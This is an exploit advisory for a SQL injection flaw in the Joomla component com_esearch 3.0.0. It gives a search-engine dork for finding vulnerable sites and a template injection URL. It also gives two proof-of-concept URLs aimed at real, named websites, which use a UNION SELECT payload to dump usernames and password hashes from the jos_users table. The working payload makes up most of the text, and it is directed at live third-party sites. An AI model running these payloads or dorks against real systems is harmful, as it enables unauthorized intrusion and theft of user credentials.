TNR Enhanced Joomla Search SQL Injection Vulnerability

[o] TNR Enhanced Joomla Search SQL Injection Vulnerability

Software : com_esearch ver 3.0.0
Vendor : http://www.tnrjoomla.com/
Dork : "com_esearch"
Author : NoGe


[o] Exploit

http://localhost/[path]/index.php?search=NoGe&option=com_esearch&searchId=[SQLi]


[o] PoC

http://www.visitdetroit.com/index.php?search=NoGe&option=com_esearch&searchId=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--
http://www.tnrjoomla.com/index.php?search=NoGe&option=com_esearch&searchId=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users--
